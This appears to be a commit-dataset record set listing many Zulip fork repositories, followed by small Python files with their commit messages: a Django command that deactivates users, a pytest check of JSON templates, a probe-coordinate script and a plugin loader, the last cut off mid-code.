ravbadami/zulip,timabbott/zulip,nicholasbs/zulip,kokoar/zulip,littledogboy/zulip,Diptanshu8/zulip,joshisa/zulip,johnnygaddarr/zulip,Qgap/zulip,dattatreya303/zulip,tommyip/zulip,zachallaun/zulip,PhilSk/zulip,zwily/zulip,xuanhan863/zulip,jphilipsen05/zulip,jimmy54/zulip,calvinleenyc/zulip,easyfmxu/zulip,lfranchi/zulip,joyhchen/zulip,souravbadami/zulip,shubhamdhama/zulip,showell/zulip,ahmadassaf/zulip,bssrdf/zulip,technicalpickles/zulip,LeeRisk/zulip,KingxBanana/zulip,wdaher/zulip,hj3938/zulip,Frouk/zulip,swinghu/zulip,zorojean/zulip,pradiptad/zulip,jessedhillon/zulip,mansilladev/zulip,mansilladev/zulip,TigorC/zulip,wdaher/zulip,ryansnowboarder/zulip,Diptanshu8/zulip,joyhchen/zulip,andersk/zulip,synicalsyntax/zulip,peiwei/zulip,luyifan/zulip,suxinde2009/zulip,udxxabp/zulip,technicalpickles/zulip,jonesgithub/zulip,swinghu/zulip,zulip/zulip,hafeez3000/zulip,so0k/zulip,dwrpayne/zulip,stamhe/zulip,codeKonami/zulip,avastu/zulip,cosmicAsymmetry/zulip,jessedhillon/zulip,vikas-parashar/zulip,fw1121/zulip,alliejones/zulip,susansls/zulip,wangdeshui/zulip,Galexrt/zulip,peiwei/zulip,seapasulli/zulip,mahim97/zulip,natanovia/zulip,technicalpickles/zulip,Galexrt/zulip,samatdav/zulip,Drooi
ds/zulip,jessedhillon/zulip,saitodisse/zulip,johnnygaddarr/zulip,Batterfii/zulip,zofuthan/zulip,joshisa/zulip,hayderimran7/zulip,grave-w-grave/zulip,kaiyuanheshang/zulip,hackerkid/zulip,itnihao/zulip,armooo/zulip,themass/zulip,dotcool/zulip,rishig/zulip,mdavid/zulip,showell/zulip,samatdav/zulip,kokoar/zulip,he15his/zulip,isht3/zulip,ipernet/zulip,karamcnair/zulip,wweiradio/zulip,christi3k/zulip,Gabriel0402/zulip,amallia/zulip,aakash-cr7/zulip,PaulPetring/zulip,brainwane/zulip,AZtheAsian/zulip,bastianh/zulip,brainwane/zulip,timabbott/zulip,so0k/zulip,JanzTam/zulip,armooo/zulip,karamcnair/zulip,fw1121/zulip,kou/zulip,ryanbackman/zulip,ipernet/zulip,yuvipanda/zulip,mahim97/zulip,levixie/zulip,souravbadami/zulip,JPJPJPOPOP/zulip,jackrzhang/zulip,adnanh/zulip,zacps/zulip,eastlhu/zulip,dhcrzf/zulip,RobotCaleb/zulip,amallia/zulip,j831/zulip,EasonYi/zulip,glovebx/zulip,Suninus/zulip,kokoar/zulip,dhcrzf/zulip,guiquanz/zulip,technicalpickles/zulip,gkotian/zulip,timabbott/zulip,wavelets/zulip,andersk/zulip,arpith/zulip,glovebx/zulip,ericzhou2008/zulip,esander91/zulip,PaulPetring/zulip,bastianh/zulip,wangdeshui/zulip,umkay/zulip,armooo/zulip,xuanhan863/zulip,zorojean/zulip,itnihao/zulip,mdavid/zulip,LAndreas/zulip,zachallaun/zulip,moria/zulip,aliceriot/zulip,willingc/zulip,RobotCaleb/zulip,vikas-parashar/zulip,zwily/zulip,jeffcao/zulip,JPJPJPOPOP/zulip,ufosky-server/zulip,timabbott/zulip,Frouk/zulip,guiquanz/zulip,Juanvulcano/zulip,jackrzhang/zulip,tbutter/zulip,hj3938/zulip,jackrzhang/zulip,dattatreya303/zulip,peguin40/zulip,noroot/zulip,wavelets/zulip,ericzhou2008/zulip,rishig/zulip,bowlofstew/zulip,DazWorrall/zulip,mohsenSy/zulip,proliming/zulip,wavelets/zulip,ikasumiwt/zulip,atomic-labs/zulip,Juanvulcano/zulip,vabs22/zulip,ipernet/zulip,amyliu345/zulip,avastu/zulip,bowlofstew/zulip,developerfm/zulip,firstblade/zulip,deer-hope/zulip,he15his/zulip,blaze225/zulip,LeeRisk/zulip,eeshangarg/zulip,jphilipsen05/zulip,zulip/zulip,ryanbackman/zulip,jrowan/zulip,ryanbackman/zulip,swinghu/zulip,hafeez3000/zulip,KingxBanana/zulip,EasonYi/zulip,RobotCaleb/zulip,krtkmj/zulip,themass/zulip,brockwhittaker/zulip,huangkebo/zulip,adnanh/zulip,bitemyapp/zulip,mohsenSy/zulip,deer-hope/zulip,MariaFaBella85/zulip,ApsOps/zulip,timabbott/zulip,littledogboy/zulip,shubhamdhama/zulip,voidException/zulip,ApsOps/zulip,zwily/zulip,yuvipanda/zulip,jackrzhang/zulip,ahmadassaf/zulip,hustlzp/zulip,rht/zulip,hustlzp/zulip,developerfm/zulip,noroot/zulip,stamhe/zulip,themass/zulip,Vallher/zulip,ikasumiwt/zulip,schatt/zulip,hackerkid/zulip,eeshangarg/zulip,dwrpayne/zulip,paxapy/zulip,susansls/zulip,TigorC/zulip,reyha/zulip,firstblade/zulip,technicalpickles/zulip,itnihao/zulip,nicholasbs/zulip,niftynei/zulip,noroot/zulip,Vallher/zulip,sonali0901/zulip,avastu/zulip,jerryge/zulip,souravbadami/zulip,ashwinirudrappa/zulip,zofuthan/zulip,udxxabp/zulip,TigorC/zulip,RobotCaleb/zulip,hafeez3000/zulip,babbage/zulip,peiwei/zulip,codeKonami/zulip,kou/zulip,vikas-parashar/zulip,karamcnair/zulip,ericzhou2008/zulip,dxq-git/zulip,vakila/zulip,blaze225/zulip,Galexrt/zulip,tbutter/zulip,shaunstanislaus/zulip,jimmy54/zulip,itnihao/zulip,schatt/zulip,yuvipanda/zulip,adnanh/zulip,voidException/zulip,vabs22/zulip,babbage/zulip,eastlhu/zulip,sonali0901/zulip,gigawhitlocks/zulip,xuxiao/zulip,Gabriel0402/zulip,zhaoweigg/zulip,zacps/zulip,avastu/zulip,moria/zulip,natanovia/zulip,firstblade/zulip,voidException/zulip,samatdav/zulip,mohsenSy/zulip,kaiyuanheshang/zulip,MayB/zulip,jainayush975/zulip,kou/zulip,aps-sids/zulip,developerfm/zulip,shrikrishnaholla/zulip,gig
awhitlocks/zulip,deer-hope/zulip,amanharitsh123/zulip,MariaFaBella85/zulip,AZtheAsian/zulip,gigawhitlocks/zulip,Qgap/zulip,samatdav/zulip,hayderimran7/zulip,MayB/zulip,wweiradio/zulip,tiansiyuan/zulip,dxq-git/zulip,alliejones/zulip,sharmaeklavya2/zulip,christi3k/zulip,verma-varsha/zulip,alliejones/zulip,glovebx/zulip,dotcool/zulip,DazWorrall/zulip,dattatreya303/zulip,karamcnair/zulip,johnnygaddarr/zulip,LAndreas/zulip,pradiptad/zulip,Batterfii/zulip,Qgap/zulip,dotcool/zulip,Jianchun1/zulip,akuseru/zulip,hj3938/zulip,guiquanz/zulip,hayderimran7/zulip,jonesgithub/zulip,shaunstanislaus/zulip,jrowan/zulip,andersk/zulip,jeffcao/zulip,Gabriel0402/zulip,schatt/zulip,jonesgithub/zulip,susansls/zulip,kaiyuanheshang/zulip,SmartPeople/zulip,MayB/zulip,codeKonami/zulip,suxinde2009/zulip,andersk/zulip,esander91/zulip,zorojean/zulip,xuanhan863/zulip,ipernet/zulip,PhilSk/zulip,grave-w-grave/zulip,Jianchun1/zulip,bowlofstew/zulip,zofuthan/zulip,tiansiyuan/zulip,amallia/zulip,synicalsyntax/zulip,dxq-git/zulip,udxxabp/zulip,LAndreas/zulip,suxinde2009/zulip,atomic-labs/zulip,christi3k/zulip,dawran6/zulip,gigawhitlocks/zulip,Diptanshu8/zulip,shubhamdhama/zulip,Cheppers/zulip,suxinde2009/zulip,andersk/zulip,dotcool/zulip,rht/zulip,wweiradio/zulip,ikasumiwt/zulip,yocome/zulip,Batterfii/zulip,huangkebo/zulip,johnnygaddarr/zulip,tiansiyuan/zulip,niftynei/zulip,grave-w-grave/zulip,bitemyapp/zulip,udxxabp/zulip,ipernet/zulip,ahmadassaf/zulip,yocome/zulip,dotcool/zulip,dawran6/zulip,SmartPeople/zulip,yuvipanda/zulip,firstblade/zulip,vikas-parashar/zulip,mdavid/zulip,tommyip/zulip,dxq-git/zulip,jerryge/zulip,hengqujushi/zulip,KJin99/zulip,nicholasbs/zulip,johnny9/zulip,pradiptad/zulip,stamhe/zulip,paxapy/zulip,JanzTam/zulip,themass/zulip,thomasboyt/zulip,aps-sids/zulip,Cheppers/zulip,akuseru/zulip,rishig/zulip,dwrpayne/zulip,noroot/zulip,lfranchi/zulip,amanharitsh123/zulip,saitodisse/zulip,christi3k/zulip,brainwane/zulip,praveenaki/zulip,wdaher/zulip,paxapy/zulip,Drooids/zulip,rishig/zulip,hackerkid/zulip,pradiptad/zulip,akuseru/zulip,johnnygaddarr/zulip,arpith/zulip,schatt/zulip,armooo/zulip,hustlzp/zulip,yuvipanda/zulip,Diptanshu8/zulip,mahim97/zulip,arpitpanwar/zulip,hj3938/zulip,ikasumiwt/zulip,yuvipanda/zulip,itnihao/zulip,voidException/zulip,jeffcao/zulip,johnny9/zulip,babbage/zulip,eeshangarg/zulip,jerryge/zulip,jonesgithub/zulip,atomic-labs/zulip,hackerkid/zulip,babbage/zulip,cosmicAsymmetry/zulip,sup95/zulip,arpitpanwar/zulip,nicholasbs/zulip,mahim97/zulip,sonali0901/zulip,wweiradio/zulip,susansls/zulip,m1ssou/zulip,ufosky-server/zulip,kou/zulip,sup95/zulip,arpitpanwar/zulip,moria/zulip,aliceriot/zulip,guiquanz/zulip,zwily/zulip,brockwhittaker/zulip,jeffcao/zulip,deer-hope/zulip,isht3/zulip,jainayush975/zulip,bitemyapp/zulip,stamhe/zulip,RobotCaleb/zulip,yocome/zulip,ryanbackman/zulip,hafeez3000/zulip,vaidap/zulip,ashwinirudrappa/zulip,peguin40/zulip,LeeRisk/zulip,ApsOps/zulip,Cheppers/zulip,souravbadami/zulip,krtkmj/zulip,gkotian/zulip,mahim97/zulip,cosmicAsymmetry/zulip,thomasboyt/zulip,punchagan/zulip,glovebx/zulip,armooo/zulip,proliming/zulip,technicalpickles/zulip,littledogboy/zulip,atomic-labs/zulip,bluesea/zulip,mansilladev/zulip,PaulPetring/zulip,kou/zulip,calvinleenyc/zulip,joyhchen/zulip,natanovia/zulip,jessedhillon/zulip,huangkebo/zulip,m1ssou/zulip,xuanhan863/zulip,grave-w-grave/zulip,rht/zulip,shrikrishnaholla/zulip,jainayush975/zulip,deer-hope/zulip,ericzhou2008/zulip,kokoar/zulip,Jianchun1/zulip,paxapy/zulip,suxinde2009/zulip,peiwei/zulip,amanharitsh123/zulip,tiansiyuan/zulip,suxinde2009/zulip,
bastianh/zulip,schatt/zulip,ikasumiwt/zulip,bastianh/zulip,eastlhu/zulip,sup95/zulip,ufosky-server/zulip,mansilladev/zulip,vikas-parashar/zulip,jackrzhang/zulip,KingxBanana/zulip,alliejones/zulip,krtkmj/zulip,DazWorrall/zulip,aps-sids/zulip,vaidap/zulip,verma-varsha/zulip,tbutter/zulip,m1ssou/zulip,tommyip/zulip,arpith/zulip,j831/zulip,vabs22/zulip,MayB/zulip,karamcnair/zulip,andersk/zulip,hengqujushi/zulip,zwily/zulip,reyha/zulip,AZtheAsian/zulip,amyliu345/zulip,jerryge/zulip,jackrzhang/zulip,joshisa/zulip,mdavid/zulip,hj3938/zulip,blaze225/zulip,armooo/zulip,huangkebo/zulip,shubhamdhama/zulip,m1ssou/zulip,Suninus/zulip,Diptanshu8/zulip,qq1012803704/zulip,jphilipsen05/zulip,christi3k/zulip,codeKonami/zulip,synicalsyntax/zulip,calvinleenyc/zulip,isht3/zulip,dnmfarrell/zulip,Jianchun1/zulip,ikasumiwt/zulip,vaidap/zulip,sharmaeklavya2/zulip,Jianchun1/zulip,showell/zulip,wangdeshui/zulip,aakash-cr7/zulip,showell/zulip,bastianh/zulip,firstblade/zulip,hengqujushi/zulip,suxinde2009/zulip,timabbott/zulip,shaunstanislaus/zulip,developerfm/zulip,samatdav/zulip,JPJPJPOPOP/zulip,pradiptad/zulip,bowlofstew/zulip,avastu/zulip,tommyip/zulip,umkay/zulip,dawran6/zulip,DazWorrall/zulip,aliceriot/zulip,glovebx/zulip,dattatreya303/zulip,atomic-labs/zulip,bluesea/zulip,cosmicAsymmetry/zulip,dattatreya303/zulip,seapasulli/zulip,kokoar/zulip,xuxiao/zulip,reyha/zulip,arpith/zulip,Vallher/zulip,synicalsyntax/zulip,zhaoweigg/zulip,hackerkid/zulip,shubhamdhama/zulip,hafeez3000/zulip,aakash-cr7/zulip,Gabriel0402/zulip,jphilipsen05/zulip,Juanvulcano/zulip,m1ssou/zulip,jphilipsen05/zulip,vakila/zulip,aakash-cr7/zulip,hackerkid/zulip,glovebx/zulip,thomasboyt/zulip,wavelets/zulip,christi3k/zulip,vaidap/zulip,johnny9/zulip,fw1121/zulip,voidException/zulip,easyfmxu/zulip,codeKonami/zulip,levixie/zulip,glovebx/zulip,PhilSk/zulip,ryansnowboarder/zulip,dhcrzf/zulip,MariaFaBella85/zulip,sonali0901/zulip,hustlzp/zulip,hayderimran7/zulip,easyfmxu/zulip,dxq-git/zulip,tbutter/zulip,levixie/zulip,firstblade/zulip,zwily/zulip,tdr130/zulip,Jianchun1/zulip,vakila/zulip,zacps/zulip,luyifan/zulip,jimmy54/zulip,itnihao/zulip,kaiyuanheshang/zulip,verma-varsha/zulip,tbutter/zulip,Suninus/zulip,adnanh/zulip,praveenaki/zulip,jrowan/zulip,xuanhan863/zulip,isht3/zulip,akuseru/zulip,mdavid/zulip,m1ssou/zulip,Drooids/zulip,sonali0901/zulip,dhcrzf/zulip,wdaher/zulip,mansilladev/zulip,shaunstanislaus/zulip,rht/zulip,xuxiao/zulip,babbage/zulip,levixie/zulip,bastianh/zulip,peiwei/zulip,moria/zulip,peiwei/zulip,bssrdf/zulip,Batterfii/zulip,tommyip/zulip,LAndreas/zulip,dhcrzf/zulip,EasonYi/zulip,krtkmj/zulip,joyhchen/zulip,alliejones/zulip,joshisa/zulip,shubhamdhama/zulip,babbage/zulip,moria/zulip,niftynei/zulip,akuseru/zulip,verma-varsha/zulip,dnmfarrell/zulip,ipernet/zulip,Batterfii/zulip,peiwei/zulip,j831/zulip,Diptanshu8/zulip,j831/zulip,bssrdf/zulip,wweiradio/zulip,EasonYi/zulip,dawran6/zulip,MariaFaBella85/zulip,dnmfarrell/zulip,eastlhu/zulip,ashwinirudrappa/zulip,udxxabp/zulip,amanharitsh123/zulip,ufosky-server/zulip,mohsenSy/zulip,zorojean/zulip,jerryge/zulip,hafeez3000/zulip,esander91/zulip,niftynei/zulip,tdr130/zulip,gigawhitlocks/zulip,KJin99/zulip,jackrzhang/zulip,hustlzp/zulip,Drooids/zulip,susansls/zulip,wdaher/zulip,vaidap/zulip,ryansnowboarder/zulip,MariaFaBella85/zulip,cosmicAsymmetry/zulip,blaze225/zulip,aps-sids/zulip,umkay/zulip,thomasboyt/zulip,ericzhou2008/zulip,karamcnair/zulip,hj3938/zulip,hustlzp/zulip,saitodisse/zulip,bluesea/zulip,xuxiao/zulip,armooo/zulip,AZtheAsian/zulip,Batterfii/zulip,umkay/zulip,kou/zulip,hustlzp/zulip,
peguin40/zulip,willingc/zulip,punchagan/zulip,synicalsyntax/zulip,ryanbackman/zulip,he15his/zulip,Galexrt/zulip,zulip/zulip,samatdav/zulip,sonali0901/zulip,shubhamdhama/zulip,hengqujushi/zulip,JanzTam/zulip,bowlofstew/zulip,mansilladev/zulip,ipernet/zulip,vakila/zulip,ApsOps/zulip,brainwane/zulip,dawran6/zulip,levixie/zulip,arpith/zulip,Vallher/zulip,dattatreya303/zulip,shaunstanislaus/zulip,tdr130/zulip,schatt/zulip,zorojean/zulip,TigorC/zulip,aliceriot/zulip,ApsOps/zulip,jainayush975/zulip,susansls/zulip,AZtheAsian/zulip,lfranchi/zulip,brockwhittaker/zulip,JanzTam/zulip,Batterfii/zulip,sup95/zulip,sharmaeklavya2/zulip,gkotian/zulip,Frouk/zulip,calvinleenyc/zulip,DazWorrall/zulip,dotcool/zulip,PaulPetring/zulip,shrikrishnaholla/zulip,zachallaun/zulip,ApsOps/zulip,tommyip/zulip,vaidap/zulip,sharmaeklavya2/zulip,umkay/zulip,bitemyapp/zulip,calvinleenyc/zulip,guiquanz/zulip,MayB/zulip,Frouk/zulip,RobotCaleb/zulip,dwrpayne/zulip,zhaoweigg/zulip,dhcrzf/zulip,zhaoweigg/zulip,zofuthan/zulip,umkay/zulip,Gabriel0402/zulip,proliming/zulip,Qgap/zulip,avastu/zulip,punchagan/zulip,aliceriot/zulip,guiquanz/zulip,Juanvulcano/zulip,qq1012803704/zulip,JPJPJPOPOP/zulip,luyifan/zulip,niftynei/zulip,adnanh/zulip,developerfm/zulip,praveenaki/zulip,joyhchen/zulip,praveenaki/zulip,dwrpayne/zulip,JanzTam/zulip,littledogboy/zulip,ryansnowboarder/zulip,KingxBanana/zulip,deer-hope/zulip,shaunstanislaus/zulip,dwrpayne/zulip,krtkmj/zulip,zachallaun/zulip,brockwhittaker/zulip,showell/zulip,seapasulli/zulip,vabs22/zulip,TigorC/zulip,wavelets/zulip,verma-varsha/zulip,tbutter/zulip,MayB/zulip,ufosky-server/zulip,adnanh/zulip,SmartPeople/zulip,zacps/zulip,zhaoweigg/zulip,peguin40/zulip,swinghu/zulip,LAndreas/zulip,punchagan/zulip,Juanvulcano/zulip,thomasboyt/zulip,grave-w-grave/zulip,amanharitsh123/zulip,vabs22/zulip,jeffcao/zulip,he15his/zulip,Qgap/zulip,willingc/zulip,zorojean/zulip,jessedhillon/zulip,punchagan/zulip,jerryge/zulip,mansilladev/zulip,seapasulli/zulip,avastu/zulip,stamhe/zulip,aakash-cr7/zulip,dnmfarrell/zulip,EasonYi/zulip,xuxiao/zulip,dotcool/zulip,adnanh/zulip,yocome/zulip,bitemyapp/zulip,rishig/zulip,aliceriot/zulip,brainwane/zulip,zofuthan/zulip,natanovia/zulip
|
Add command to mark users as inactive.
This is useful when testing the signup workflow, as this script enables you
to run through an MIT signup without manually creating a new inactive user
in the database.
(imported from commit c22649cc7c561c2fbe8682d1b17d7e5aba9ac04e)
|
from optparse import make_option
from django.core.management.base import BaseCommand
from confirmation.models import Confirmation
from zephyr.models import User, MitUser
class Command(BaseCommand):
help = "Mark one or more users as inactive in the database."
def handle(self, *args, **options):
for email in args:
try:
user = User.objects.get(email=email)
if user.is_active:
user.is_active = False
user.save()
print email + ": Deactivated."
else:
print email + ": Already inactive."
except User.DoesNotExist:
print email + ": User does not exist in database"
|
<commit_before><commit_msg>Add command to mark users as inactive.
This is useful when testing the signup workflow, as this script enables you
to run through an MIT signup without manually creating a new inactive user
in the database.
(imported from commit c22649cc7c561c2fbe8682d1b17d7e5aba9ac04e)<commit_after>
|
from optparse import make_option
from django.core.management.base import BaseCommand
from confirmation.models import Confirmation
from zephyr.models import User, MitUser
class Command(BaseCommand):
help = "Mark one or more users as inactive in the database."
def handle(self, *args, **options):
for email in args:
try:
user = User.objects.get(email=email)
if user.is_active:
user.is_active = False
user.save()
print email + ": Deactivated."
else:
print email + ": Already inactive."
except User.DoesNotExist:
print email + ": User does not exist in database"
|
Add command to mark users as inactive.
This is useful when testing the signup workflow, as this script enables you
to run through an MIT signup without manually creating a new inactive user
in the database.
(imported from commit c22649cc7c561c2fbe8682d1b17d7e5aba9ac04e)from optparse import make_option
from django.core.management.base import BaseCommand
from confirmation.models import Confirmation
from zephyr.models import User, MitUser
class Command(BaseCommand):
help = "Mark one or more users as inactive in the database."
def handle(self, *args, **options):
for email in args:
try:
user = User.objects.get(email=email)
if user.is_active:
user.is_active = False
user.save()
print email + ": Deactivated."
else:
print email + ": Already inactive."
except User.DoesNotExist:
print email + ": User does not exist in database"
|
<commit_before><commit_msg>Add command to mark users as inactive.
This is useful when testing the signup workflow, as this script enables you
to run through an MIT signup without manually creating a new inactive user
in the database.
(imported from commit c22649cc7c561c2fbe8682d1b17d7e5aba9ac04e)<commit_after>from optparse import make_option
from django.core.management.base import BaseCommand
from confirmation.models import Confirmation
from zephyr.models import User, MitUser
class Command(BaseCommand):
help = "Mark one or more users as inactive in the database."
def handle(self, *args, **options):
for email in args:
try:
user = User.objects.get(email=email)
if user.is_active:
user.is_active = False
user.save()
print email + ": Deactivated."
else:
print email + ": Already inactive."
except User.DoesNotExist:
print email + ": User does not exist in database"
|
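Django management commands are invoked by module name, which this record does not show, so the command name below is a hypothetical stand-in; the email addresses become the args tuple that handle() iterates over. A minimal invocation sketch:

from django.core.management import call_command

# "deactivate_user" is a placeholder; the record shows the command's body
# but not the file name it is registered under.
call_command("deactivate_user", "alice@mit.edu", "bob@mit.edu")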
|
93f12cfc5a5719b195ca0b714a1b4200964b598b
|
tests/test_valid_json_templates.py
|
tests/test_valid_json_templates.py
|
"""Test validity of json in templates"""
import pytest
import json
from jinja2 import Template
from jinja2.exceptions import TemplateNotFound
from foremast.utils import get_template
def test_get_template():
with pytest.raises(TemplateNotFound):
template = get_template(template_file='doesnotexist.json.j2')
def valid_json(template, data):
parsed_template = get_template(
template_file=template,
data=data)
assert type(json.loads(parsed_template)) == dict
def test_valid_json_configs():
data = {
'env': 'dev',
'profile': 'profile',
'app': 'testapp',
}
valid_json(template='configs.json.j2', data=data)
def test_valid_json_pipeline():
data = {}
valid_json(template='pipeline.json.j2', data=data)
|
Add test to validate json of templates
|
Add test to validate json of templates
|
Python
|
apache-2.0
|
gogoair/foremast,gogoair/foremast
|
Add test to validate json of templates
|
"""Test validity of json in templates"""
import pytest
import json
from jinja2 import Template
from jinja2.exceptions import TemplateNotFound
from foremast.utils import get_template
def test_get_template():
with pytest.raises(TemplateNotFound):
template = get_template(template_file='doesnotexist.json.j2')
def valid_json(template, data):
parsed_template = get_template(
template_file=template,
data=data)
assert type(json.loads(parsed_template)) == dict
def test_valid_json_configs():
data = {
'env': 'dev',
'profile': 'profile',
'app': 'testapp',
}
valid_json(template='configs.json.j2', data=data)
def test_valid_json_pipeline():
data = {}
valid_json(template='pipeline.json.j2', data=data)
|
<commit_before><commit_msg>Add test to validate json of templates<commit_after>
|
"""Test validity of json in templates"""
import pytest
import json
from jinja2 import Template
from jinja2.exceptions import TemplateNotFound
from foremast.utils import get_template
def test_get_template():
with pytest.raises(TemplateNotFound):
template = get_template(template_file='doesnotexist.json.j2')
def valid_json(template, data):
parsed_template = get_template(
template_file=template,
data=data)
assert type(json.loads(parsed_template)) == dict
def test_valid_json_configs():
data = {
'env': 'dev',
'profile': 'profile',
'app': 'testapp',
}
valid_json(template='configs.json.j2', data=data)
def test_valid_json_pipeline():
data = {}
valid_json(template='pipeline.json.j2', data=data)
|
Add test to validate json of templates"""Test validity of json in templates"""
import pytest
import json
from jinja2 import Template
from jinja2.exceptions import TemplateNotFound
from foremast.utils import get_template
def test_get_template():
with pytest.raises(TemplateNotFound):
template = get_template(template_file='doesnotexist.json.j2')
def valid_json(template, data):
parsed_template = get_template(
template_file=template,
data=data)
assert type(json.loads(parsed_template)) == dict
def test_valid_json_configs():
data = {
'env': 'dev',
'profile': 'profile',
'app': 'testapp',
}
valid_json(template='configs.json.j2', data=data)
def test_valid_json_pipeline():
data = {}
valid_json(template='pipeline.json.j2', data=data)
|
<commit_before><commit_msg>Add test to validate json of templates<commit_after>"""Test validity of json in templates"""
import pytest
import json
from jinja2 import Template
from jinja2.exceptions import TemplateNotFound
from foremast.utils import get_template
def test_get_template():
with pytest.raises(TemplateNotFound):
template = get_template(template_file='doesnotexist.json.j2')
def valid_json(template, data):
parsed_template = get_template(
template_file=template,
data=data)
assert type(json.loads(parsed_template)) == dict
def test_valid_json_configs():
data = {
'env': 'dev',
'profile': 'profile',
'app': 'testapp',
}
valid_json(template='configs.json.j2', data=data)
def test_valid_json_pipeline():
data = {}
valid_json(template='pipeline.json.j2', data=data)
|
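The pattern the test relies on, render a template and require that the output parses to a JSON object, can be shown standalone. This sketch substitutes a literal string for foremast's get_template, which is the only assumption made:

import json

rendered = '{"env": "dev", "app": "testapp"}'  # stands in for get_template(...)
parsed = json.loads(rendered)                  # raises ValueError on invalid JSON
assert isinstance(parsed, dict)                # a JSON object, not a list or scalar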
|
a9e486aa105076d999bec8320a9486812db8889d
|
scripts/probefile.py
|
scripts/probefile.py
|
#!/usr/bin/env python
"""This script create the probe specification file to match experiments."""
from __future__ import division, print_function
import numpy as np
import pandas as pd
H = 0.807
R = 0.5375
# All coordinates should be normalized by radius
z_H = np.arange(0.0, 0.751, 0.125)
z_R = z_H * H / R
# Load y_R locations from experimental test plan
df = pd.read_csv("RM2-tow-tank/Config/Test plan/Wake-1.0-0.0.csv")
y_R = df["y/R"].values
x = 1.0
x_R = x/R
coords = []
for z in z_R:
for y in y_R:
coords.append("{} {} {}".format(x_R, y, z))
nprobes = len(coords)
with open("./config/probes.txt", "w") as f:
f.write(str(nprobes) + "\n")
for coord in coords:
f.write(coord + "\n")
|
Add script to create probes file
|
Add script to create probes file
|
Python
|
mit
|
petebachant/RM2-CACTUS,petebachant/RM2-CACTUS,UNH-CORE/RM2-CACTUS,petebachant/RM2-CACTUS,UNH-CORE/RM2-CACTUS,UNH-CORE/RM2-CACTUS
|
Add script to create probes file
|
#!/usr/bin/env python
"""This script create the probe specification file to match experiments."""
from __future__ import division, print_function
import numpy as np
import pandas as pd
H = 0.807
R = 0.5375
# All coordinates should be normalized by radius
z_H = np.arange(0.0, 0.751, 0.125)
z_R = z_H * H / R
# Load y_R locations from experimental test plan
df = pd.read_csv("RM2-tow-tank/Config/Test plan/Wake-1.0-0.0.csv")
y_R = df["y/R"].values
x = 1.0
x_R = x/R
coords = []
for z in z_R:
for y in y_R:
coords.append("{} {} {}".format(x_R, y, z))
nprobes = len(coords)
with open("./config/probes.txt", "w") as f:
f.write(str(nprobes) + "\n")
for coord in coords:
f.write(coord + "\n")
|
<commit_before><commit_msg>Add script to create probes file<commit_after>
|
#!/usr/bin/env python
"""This script create the probe specification file to match experiments."""
from __future__ import division, print_function
import numpy as np
import pandas as pd
H = 0.807
R = 0.5375
# All coordinates should be normalized by radius
z_H = np.arange(0.0, 0.751, 0.125)
z_R = z_H * H / R
# Load y_R locations from experimental test plan
df = pd.read_csv("RM2-tow-tank/Config/Test plan/Wake-1.0-0.0.csv")
y_R = df["y/R"].values
x = 1.0
x_R = x/R
coords = []
for z in z_R:
for y in y_R:
coords.append("{} {} {}".format(x_R, y, z))
nprobes = len(coords)
with open("./config/probes.txt", "w") as f:
f.write(str(nprobes) + "\n")
for coord in coords:
f.write(coord + "\n")
|
Add script to create probes file#!/usr/bin/env python
"""This script create the probe specification file to match experiments."""
from __future__ import division, print_function
import numpy as np
import pandas as pd
H = 0.807
R = 0.5375
# All coordinates should be normalized by radius
z_H = np.arange(0.0, 0.751, 0.125)
z_R = z_H * H / R
# Load y_R locations from experimental test plan
df = pd.read_csv("RM2-tow-tank/Config/Test plan/Wake-1.0-0.0.csv")
y_R = df["y/R"].values
x = 1.0
x_R = x/R
coords = []
for z in z_R:
for y in y_R:
coords.append("{} {} {}".format(x_R, y, z))
nprobes = len(coords)
with open("./config/probes.txt", "w") as f:
f.write(str(nprobes) + "\n")
for coord in coords:
f.write(coord + "\n")
|
<commit_before><commit_msg>Add script to create probes file<commit_after>#!/usr/bin/env python
"""This script create the probe specification file to match experiments."""
from __future__ import division, print_function
import numpy as np
import pandas as pd
H = 0.807
R = 0.5375
# All coordinates should be normalized by radius
z_H = np.arange(0.0, 0.751, 0.125)
z_R = z_H * H / R
# Load y_R locations from experimental test plan
df = pd.read_csv("RM2-tow-tank/Config/Test plan/Wake-1.0-0.0.csv")
y_R = df["y/R"].values
x = 1.0
x_R = x/R
coords = []
for z in z_R:
for y in y_R:
coords.append("{} {} {}".format(x_R, y, z))
nprobes = len(coords)
with open("./config/probes.txt", "w") as f:
f.write(str(nprobes) + "\n")
for coord in coords:
f.write(coord + "\n")
|
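The file the script writes has a simple layout: a probe count on the first line, then one whitespace-separated x/R y/R z/R triple per line. A minimal reader for that format, assuming the probes.txt generated above exists:

with open("./config/probes.txt") as f:
    nprobes = int(f.readline())                               # first line: probe count
    probes = [tuple(map(float, line.split())) for line in f]  # one triple per line
assert len(probes) == nprobes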
|
f03dddf47968c75bcda2b66ac28da0c04b7dc23e
|
gridded/gridded.py
|
gridded/gridded.py
|
class Gridded:
_grid_obj_classes = []
_grids_loaded = False
@classmethod
def _load_grid_objs(cls):
from pkg_resources import working_set
for ep in working_set.iter_entry_points('gridded.grid_objects'):
cls._grid_obj_classes.append(ep.load())
@classmethod
    def load(cls, nc, *args, **kwargs):
        if not cls._grids_loaded:      # discover plugin classes on first use
            cls._load_grid_objs()
            cls._grids_loaded = True
        for go in cls._grid_obj_classes:
if hasattr(go, 'is_mine') and go.is_mine(nc):
return go(nc, *args, **kwargs)
|
Add Gridded loader module (to be moved)
|
Add Gridded loader module (to be moved)
|
Python
|
mit
|
pyoceans/gridded
|
Add Gridded loader module (to be moved)
|
class Gridded:
_grid_obj_classes = []
_grids_loaded = False
@classmethod
def _load_grid_objs(cls):
from pkg_resources import working_set
for ep in working_set.iter_entry_points('gridded.grid_objects'):
cls._grid_obj_classes.append(ep.load())
@classmethod
    def load(cls, nc, *args, **kwargs):
        if not cls._grids_loaded:      # discover plugin classes on first use
            cls._load_grid_objs()
            cls._grids_loaded = True
        for go in cls._grid_obj_classes:
if hasattr(go, 'is_mine') and go.is_mine(nc):
return go(nc, *args, **kwargs)
|
<commit_before><commit_msg>Add Gridded loader module (to be moved)<commit_after>
|
class Gridded:
_grid_obj_classes = []
_grids_loaded = False
@classmethod
def _load_grid_objs(cls):
from pkg_resources import working_set
for ep in working_set.iter_entry_points('gridded.grid_objects'):
cls._grid_obj_classes.append(ep.load())
@classmethod
    def load(cls, nc, *args, **kwargs):
        if not cls._grids_loaded:      # discover plugin classes on first use
            cls._load_grid_objs()
            cls._grids_loaded = True
        for go in cls._grid_obj_classes:
if hasattr(go, 'is_mine') and go.is_mine(nc):
